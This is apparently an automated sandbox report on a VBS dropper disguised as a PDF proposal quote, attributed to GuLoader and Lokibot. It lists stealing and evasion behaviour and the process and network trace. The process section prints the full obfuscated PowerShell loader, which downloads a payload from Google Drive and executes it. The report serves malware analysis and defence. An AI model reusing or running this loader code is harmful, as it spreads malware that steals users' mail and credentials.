Malware Analysis Report

2024-11-30 23:38

Sample ID 240418-xr3dqadd3s
Target Request for Proposal Quote_2414976·pdf.vbs
SHA256 56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0
Tags
guloader lokibot collection downloader spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0

Threat Level: Known bad

The file Request for Proposal Quote_2414976·pdf.vbs was found to be: Known bad.

Malicious Activity Summary

guloader lokibot collection downloader spyware stealer trojan

Lokibot

Guloader,Cloudeye

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

outlook_office_path

outlook_win_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-18 19:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-18 19:06

Reported

2024-04-18 19:08

Platform

win7-20240221-en

Max time kernel

147s

Max time network

118s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Proposal Quote_2414976·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1592 set thread context of 2772 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1948 wrote to memory of 1640 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1948 wrote to memory of 1640 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1948 wrote to memory of 1640 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1640 wrote to memory of 2956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1640 wrote to memory of 2956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1640 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1592 wrote to memory of 2756 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1592 wrote to memory of 2756 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1592 wrote to memory of 2756 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1592 wrote to memory of 2756 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1592 wrote to memory of 2772 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1592 wrote to memory of 2772 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1592 wrote to memory of 2772 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1592 wrote to memory of 2772 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1592 wrote to memory of 2772 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1592 wrote to memory of 2772 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Proposal Quote_2414976·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
GB 142.250.187.238:443 drive.google.com tcp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
